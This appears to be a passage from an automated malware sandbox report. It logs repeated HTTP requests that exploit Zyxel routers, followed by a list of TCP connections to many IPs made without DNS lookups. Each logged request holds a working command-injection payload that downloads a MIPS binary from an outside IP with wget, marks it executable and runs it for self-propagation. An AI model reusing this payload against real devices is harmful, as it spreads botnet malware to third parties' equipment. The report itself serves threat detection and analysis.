            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 41.84.236.140
            Source: unknownTCP traffic detected without corresponding DNS query: 41.107.251.212
            Source: unknownTCP traffic detected without corresponding DNS query: 157.79.161.215
            Source: unknownTCP traffic detected without corresponding DNS query: 41.23.101.69
            Source: unknownTCP traffic detected without corresponding DNS query: 155.76.85.179
            Source: unknownTCP traffic detected without corresponding DNS query: 197.154.152.150
            Source: unknownTCP traffic detected without corresponding DNS query: 157.140.177.213
            Source: unknownTCP traffic detected without corresponding DNS query: 197.6.217.252
            Source: unknownTCP traffic detected without corresponding DNS query: 105.187.211.233
            Source: unknownTCP traffic detected without corresponding DNS query: 157.54.241.98
            Source: unknownTCP traffic detected without corresponding DNS query: 197.45.174.28
            Source: unknownTCP traffic detected without corresponding DNS query: 197.230.53.13
            Source: unknownTCP traffic detected without corresponding DNS query: 41.62.241.125
            Source: unknownTCP traffic detected without corresponding DNS query: 157.9.104.111
            Source: unknownTCP traffic detected without corresponding DNS query: 76.11.199.97
            Source: unknownTCP traffic detected without corresponding DNS query: 36.17.47.30
            Source: unknownTCP traffic detected without corresponding DNS query: 157.89.188.206
            Source: unknownTCP traffic detected without corresponding DNS query: 197.115.12.45
            Source: unknownTCP traffic detected without corresponding DNS query: 196.104.109.136
            Source: unknownTCP traffic detected without corresponding DNS query: 157.220.149.36
            Source: unknownTCP traffic detected without corresponding DNS query: 41.98.34.104
            Source: unknownTCP traffic detected without corresponding DNS query: 41.123.67.59
            Source: unknownTCP traffic detected without corresponding DNS query: 180.240.229.16
            Source: unknownTCP traffic detected without corresponding DNS query: 157.59.86.56
            Source: unknownTCP traffic detected without corresponding DNS query: 157.164.147.176
            Source: unknownTCP traffic detected without corresponding DNS query: 157.244.6.37
            Source: unknownTCP traffic detected without corresponding DNS query: 72.157.125.197
            Source: unknownTCP traffic detected without corresponding DNS query: 41.15.112.213
            Source: unknownTCP traffic detected without corresponding DNS query: 41.155.221.76
            Source: unknownTCP traffic detected without corresponding DNS query: 157.213.66.48
            Source: unknownTCP traffic detected without corresponding DNS query: 197.131.148.248
            Source: unknownTCP traffic detected without corresponding DNS query: 197.162.226.97
            Source: unknownTCP traffic detected without corresponding DNS query: 118.185.216.24
            Source: unknownTCP traffic detected without corresponding DNS query: 41.125.83.147
            Source: unknownTCP traffic detected without corresponding DNS query: 157.101.122.230
            Source: unknownTCP traffic detected without corresponding DNS query: 157.128.206.152
            Source: unknownTCP traffic detected without corresponding DNS query: 41.108.193.102
            Source: unknownTCP traffic detected without corresponding DNS query: 197.113.254.3
            Source: unknownTCP traffic detected without corresponding DNS query: 41.249.224.52
            Source: unknownTCP traffic detected without corresponding DNS query: 141.69.24.176
            Source: unknownTCP traffic detected without corresponding DNS query: 41.55.25.253
            Source: unknownTCP traffic detected without corresponding DNS query: 78.100.155.81
            Source: unknownTCP traffic detected without corresponding DNS query: 197.255.245.84
            Source: unknownTCP traffic detected without corresponding DNS query: 52.245.202.151
            Source: unknownTCP traffic detected without corresponding DNS query: 41.137.22.240
            Source: unknownTCP traffic detected without corresponding DNS query: 41.232.30.181
            Source: unknownTCP traffic detected without corresponding DNS query: 157.82.63.188
            Source: unknownTCP traffic detected without corresponding DNS query: 197.144.22.55
            Source: unknownTCP traffic detected without corresponding DNS query: 157.4.177.218
            Source: unknownTCP traffic detected without corresponding DNS query: 157.0.39.88
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
